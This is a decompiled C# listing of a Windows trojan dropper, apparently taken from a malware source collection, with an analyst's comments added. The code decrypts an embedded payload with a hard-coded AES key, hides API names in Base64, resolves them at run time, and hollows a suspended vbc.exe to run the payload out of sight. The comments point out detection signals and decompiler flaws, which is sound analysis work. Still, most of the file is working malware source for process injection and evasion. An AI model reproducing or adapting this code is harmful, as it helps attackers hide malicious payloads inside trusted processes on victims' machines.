MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.mhc-b990926a4bd477f047390ee34a32b36eceff630b2274232e6245f16ff668165c/Program/Main.cs


2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: rat2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 34AA2F6B-B491-449A-8142-3C7100CB7507
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.mhc-b990926a4bd477f047390ee34a32b36eceff630b2274232e6245f16ff668165c.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
// Analyst annotation: decompiled dropper/injector form class.
// On load it decrypts an embedded resource with a hard-coded AES (Rijndael) key and IV, then
// passes the plaintext to a routine that follows the process-hollowing pattern
// (MITRE ATT&CK T1055.012) against a suspended copy of the .NET Framework 2.0 vbc.exe.
// The references to Microsoft.VisualBasic.CompilerServices/ProjectData suggest the original
// was VB.NET. As C# this listing is not buildable (a method named like its enclosing type,
// a local read before assignment), so read it as decompiler output, not original source.
// Code tokens below are unchanged; only comments were added.
public class Main : Form
{
private IContainer Components;
// Allocated in the constructor; no other use is visible in this listing.
private StringBuilder pGćumcXUežkYzlIo;
// Entry point: runs the (invisible) form; the payload logic hangs off its Load event.
[STAThread]
public static void Main() => Application.Run((Form) new Program.Main());
// Builds a window the user cannot see: 1x1 client area, zero opacity, no taskbar button.
// The Load handler is subscribed first, so the injection runs as soon as the form is shown.
public Main()
{
this.Load += new EventHandler(this.Main_Load);
this.pGćumcXUežkYzlIo = new StringBuilder();
Application.EnableVisualStyles();
this.InitializeComponent();
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(1, 1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Name = nameof (Main);
this.Text = nameof (Main);
this.ResumeLayout(false);
this.PerformLayout();
}
// Standard WinForms dispose pattern; Components is never assigned in this listing.
protected override void Dispose(bool Disposing)
{
if (Disposing && this.Components != null)
this.Components.Dispose();
base.Dispose(Disposing);
}
// Empty designer stub: the form has no controls.
[DebuggerStepThrough]
private void InitializeComponent()
{
}
// Decrypts the supplied buffer with Rijndael (AES, 128-bit key) and returns the plaintext.
// Mode and padding are not set, so the RijndaelManaged defaults (CBC, PKCS7) apply.
// Both key and IV are constants embedded in the binary, and the key is the IV byte-reversed,
// so the embedded payload can be recovered statically without running the sample.
// The byte sequences below are also usable as static signature material.
public byte[] yIqmESvzfIYlZljžguRŽ(byte[] mZqyPŠJVVTlqŽVžaY)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 48,
(byte) 102,
(byte) 215,
(byte) 119,
(byte) 4,
(byte) 193,
(byte) 141,
(byte) 50,
(byte) 10,
(byte) 3,
(byte) 189,
(byte) 220,
(byte) 157,
(byte) 222,
(byte) 243,
(byte) 22
};
rijndaelManaged.Key = new byte[16]
{
(byte) 22,
(byte) 243,
(byte) 222,
(byte) 157,
(byte) 220,
(byte) 189,
(byte) 3,
(byte) 10,
(byte) 50,
(byte) 141,
(byte) 193,
(byte) 4,
(byte) 119,
(byte) 215,
(byte) 102,
(byte) 48
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(mZqyPŠJVVTlqŽVžaY, 0, mZqyPŠJVVTlqŽVžaY.Length);
}
}
// Only these two imports are declared statically. Every other native API is resolved at
// run time by name, so the import metadata alone does not reveal the injection capability.
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
// Generic resolver: LoadLibraryA(name) + GetProcAddress(method), wrapped as delegate type T.
// Neither return value is checked; a failed lookup surfaces as an exception from
// Marshal.GetDelegateForFunctionPointer, outside the try block of the caller below.
public T ĐaAavDBJxBRšgEvV<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));
// Process-hollowing routine. First argument: raw bytes of a PE image (the decrypted payload);
// second argument: command line of the host process to start.
// Returns false only when an exception is caught; every other path returns true, including
// the ones where process creation or a later step failed, so the result is not a success signal.
// The offsets and ToInt32() conversions are consistent with a 32-bit PE32 payload and an
// x86 thread context (TODO confirm against the sample's PE header).
// Detection-relevant behaviour: a suspended child process, a section unmap and a
// read-write-execute allocation in that child, cross-process writes, a thread-context
// rewrite, then a resume.
public bool FQžsPĐqjNŠJćBPUP(byte[] đhXĐtHKžsJBFqPsNđA, string zmkESwRqWSylPWđW)
{
// API and DLL names are Base64-encoded to keep them out of plain-string scans.
// "a2VybmVsMzI=" decodes to "kernel32" and "bnRkbGw=" to "ntdll".
// Decodes to CreateProcessA.
Program.Main.liLšaggJeUASaožILY lšaggJeUaSaožIly = this.ĐaAavDBJxBRšgEvV<Program.Main.liLšaggJeUASaožILY>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
// Decodes to GetThreadContext.
Program.Main.kjČNLnGZcUUkhFicLqtt lnGzcUukhFicLqtt = this.ĐaAavDBJxBRšgEvV<Program.Main.kjČNLnGZcUUkhFicLqtt>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
// Decodes to ReadProcessMemory.
Program.Main.gCGAiXSyNQČknfhJj cgAiXsyNqČknfhJj = this.ĐaAavDBJxBRšgEvV<Program.Main.gCGAiXSyNQČknfhJj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
// Decodes to VirtualAllocEx.
Program.Main.ČAQFKKOQEZldODwEZZ čaqfkkoqeZldOdwEzz = this.ĐaAavDBJxBRšgEvV<Program.Main.ČAQFKKOQEZldODwEZZ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
// Decodes to WriteProcessMemory.
Program.Main.OšHaSOEWWpQrhUwndU haSoewWpQrhUwndU = this.ĐaAavDBJxBRšgEvV<Program.Main.OšHaSOEWWpQrhUwndU>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
// Decodes to SetThreadContext.
Program.Main.uXpYUtBjDŽkjGcžxrmi yutBjDžkjGcžxrmi = this.ĐaAavDBJxBRšgEvV<Program.Main.uXpYUtBjDŽkjGcžxrmi>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
// Decodes to ResumeThread.
Program.Main.lUajoIDAlCČŽBwLh lUajoIdAlCčžBwLh = this.ĐaAavDBJxBRšgEvV<Program.Main.lUajoIDAlCČŽBwLh>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
// Decodes to ZwUnmapViewOfSection, resolved from ntdll.
Program.Main.kĐvNlEwJSwŽNGČeZĆĐnš nlEwJswŽngČeZćĐnš = this.ĐaAavDBJxBRšgEvV<Program.Main.kĐvNlEwJSwŽNGČeZĆĐnš>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
// Four pointer-sized slots standing in for PROCESS_INFORMATION: [0] is used below as the
// process handle and [1] as the thread handle.
IntPtr[] WeWlVVuInjwBčWačmrX = new IntPtr[4];
// 68 zeroed bytes standing in for STARTUPINFO (its size on 32-bit Windows).
byte[] cdybCCzžĆOxĐDtžčG = new byte[68];
// Offset 60 of the payload is the DOS header's e_lfanew (offset of the PE header).
// None of the header offsets read here are range-checked; a malformed buffer throws and
// ends up in the catch block.
int int32_1 = BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, 60);
// PE header + 6: NumberOfSections.
int int16 = (int) BitConverter.ToInt16(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 6));
// PE header + 84: SizeOfHeaders (PE32 optional-header layout).
IntPtr WJqImihČĐkeĆaIFh = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 84)));
// Starts the host from the command line only; creation flag 4 corresponds to CREATE_SUSPENDED.
if (lšaggJeUaSaožIly((string) null, new StringBuilder(zmkESwRqWSylPWđW), zero1, zero1, false, 4, zero1, (string) null, cdybCCzžĆOxĐDtžčG, WeWlVVuInjwBčWačmrX))
{
// 179 uints = 716 bytes, the size of the x86 CONTEXT structure; element 0 is ContextFlags
// and 65538 (0x10002) matches CONTEXT_INTEGER on x86.
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (lnGzcUukhFicLqtt(WeWlVVuInjwBčWačmrX[1], numArray1))
{
// Element 41 is byte offset 164 (Ebx in the x86 CONTEXT). For a freshly created suspended
// process this is commonly the PEB address, and PEB + 8 holds the image base address.
IntPtr ŠćwzLerTgđČePĆPzfQKS = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr šbovAwAoREHLIrŽžĆBkO = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
// Reads the host's current image base (4 bytes) and unmaps that image from the child.
// The unmap must return 0 for the remaining steps to run.
if (cgAiXsyNqČknfhJj(WeWlVVuInjwBčWačmrX[0], ŠćwzLerTgđČePĆPzfQKS, ref zero2, (int) šbovAwAoREHLIrŽžĆBkO, ref zero3) && nlEwJswŽngČeZćĐnš(WeWlVVuInjwBčWačmrX[0], zero2) == 0U)
{
// PE header + 52: ImageBase; PE header + 80: SizeOfImage.
IntPtr num1 = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 80)));
// 12288 (0x3000) matches MEM_COMMIT | MEM_RESERVE and 64 (0x40) PAGE_EXECUTE_READWRITE.
// The result is not checked for failure (zero) before it is used as a write target.
IntPtr WZEfUoIkLLđPhxozF = čaqfkkoqeZldOdwEzz(WeWlVVuInjwBčWačmrX[0], num1, num2, 12288, 64);
int int32_2 = WZEfUoIkLLđPhxozF.ToInt32();
// NOTE(review): this local is passed by value without ever being assigned, which C# rejects.
// Presumably a by-reference "bytes written" argument in the original; decompiler artifact.
int QjSXčShRĐfuaYjđŽĆlF;
// Writes the PE headers into the new region. As with every write below, the success
// flag is stored in a throwaway local and never acted on.
int num3 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], WZEfUoIkLLđPhxozF, đhXĐtHKžsJBFqPsNđA, checked ((uint) (int) WJqImihČĐkeĆaIFh), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
// Walks the section table: 40-byte entries starting at PE header + 248 (PE32 layout).
while (num5 <= num4)
{
// One section header viewed as ten 32-bit values: dst[3] = VirtualAddress,
// dst[4] = SizeOfRawData, dst[5] = PointerToRawData.
int[] dst = new int[10];
Buffer.BlockCopy((Array) đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) đhXĐtHKžsJBFqPsNđA, dst[5], (Array) numArray2, 0, numArray2.Length);
// Destination = allocated base + the section's VirtualAddress.
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], num2, numArray2, checked ((uint) (int) num1), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
checked { ++num5; }
}
// Overwrites the image-base field at PEB + 8 with the address of the newly written image.
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], num2, BitConverter.GetBytes(WZEfUoIkLLđPhxozF.ToInt32()), checked ((uint) (int) num1), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
// Element 44 is byte offset 176 (Eax in the x86 CONTEXT), set to new base +
// AddressOfEntryPoint (PE header + 40) so the thread starts in the payload once resumed.
numArray1[44] = checked ((uint) (WZEfUoIkLLđPhxozF.ToInt32() + BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, int32_1 + 40)));
int num8 = yutBjDžkjGcžxrmi(WeWlVVuInjwBčWačmrX[1], numArray1) ? 1 : 0;
}
}
// Runs whenever process creation succeeded, even if the context read, memory read or unmap
// above failed; in that case the unmodified host is resumed.
// The process and thread handles are never closed in this listing.
int num = (int) lUajoIdAlCčžBwLh(WeWlVVuInjwBčWačmrX[1]);
}
}
catch (Exception ex)
{
// VB.NET-style error bookkeeping; any exception is swallowed and reported as false.
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
// Load handler: fetches the embedded resource named "glavni", decrypts it with the hard-coded
// key and hands it to the hollowing routine. The Base64 string decodes to
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, the host that gets started suspended.
// The form then closes, so the dropper exits while the payload keeps running in that child.
// Detection: vbc.exe started by a parent that is not a build tool or compiler host, with no
// source-file arguments on its command line, is a useful process-creation signal.
private void Main_Load(object sender, EventArgs e)
{
// The result of this first lookup is discarded.
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
this.FQžsPĐqjNŠJćBPUP(this.yIqmESvzfIYlZljžguRŽ(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
this.Close();
}
// Delegate signatures for the dynamically resolved APIs. The name mapping comes from the
// decoded strings in the hollowing routine; structures are passed as raw arrays.
// Bound to CreateProcessA.
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool liLšaggJeUASaožILY(
string ioTwšhmćJoWžbkJqW,
StringBuilder hvKuTwugaluJwđwšUt,
IntPtr zšCQIzOwuVŠqoxzuh,
IntPtr wEEYFXčuqidđjPĆJcss,
[MarshalAs(UnmanagedType.Bool)] bool oqCqqsĐlVsCtŽRZQPđgw,
int WtWŠXPqjdBŽČdbqUE,
IntPtr nćNpOđkbĆtžolrfPUXyg,
string ĐĐVUaćgduTYukGHj,
byte[] cdybCCzžĆOxĐDtžčG,
IntPtr[] WeWlVVuInjwBčWačmrX);
// Bound to WriteProcessMemory. The last parameter is a by-value int here, whereas the
// native API takes a pointer to the bytes-written count (likely lost in decompilation).
public delegate bool OšHaSOEWWpQrhUwndU(
IntPtr WXvpCIYlSnxqŠšGčxmc,
IntPtr WZEfUoIkLLđPhxozF,
byte[] OibqgŠyakgŽtxtjyoCa,
uint WJqImihČĐkeĆaIFh,
int QjSXčShRĐfuaYjđŽĆlF);
// Bound to ReadProcessMemory.
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool gCGAiXSyNQČknfhJj(
IntPtr XXmžežćIđčknFBTmz,
IntPtr ŠćwzLerTgđČePĆPzfQKS,
ref IntPtr ĐCapyPtĆčxqNHYJs,
int šbovAwAoREHLIrŽžĆBkO,
ref IntPtr ssNDtKĆeDHSŽQdgĆĆHYn);
// Bound to VirtualAllocEx.
public delegate IntPtr ČAQFKKOQEZldODwEZZ(
IntPtr XiyfXnIAgzKšRBkGc,
IntPtr fGŽFCFRemšpAFpŠGNxD,
IntPtr BNJECŠužcOkyobPFU,
int šELABbĆxlUnĆBFBe,
int fepAkĆsZDAČČsmFćAčh);
// Bound to ZwUnmapViewOfSection (ntdll); returns an NTSTATUS value, 0 on success.
public delegate uint kĐvNlEwJSwŽNGČeZĆĐnš(IntPtr arcaBZpWđčiagŠblvj, IntPtr ćYšwdIXERćqmzŽTq);
// Bound to ResumeThread.
public delegate uint lUajoIDAlCČŽBwLh(IntPtr GilVZdjJzXQŽAHzp);
// Bound to GetThreadContext; the CONTEXT structure is passed as a uint array.
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool kjČNLnGZcUUkhFicLqtt(IntPtr LČSyPTYPčQĐScejlFđa, uint[] dhbJđČxSgUTpgćeKpi);
// Bound to SetThreadContext; same uint-array representation of CONTEXT.
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool uXpYUtBjDŽkjGcžxrmi(IntPtr HlpzŽĆXeiŽybNpdpYW, uint[] ĆAbxvlKAsNUEčTpqP);
}
}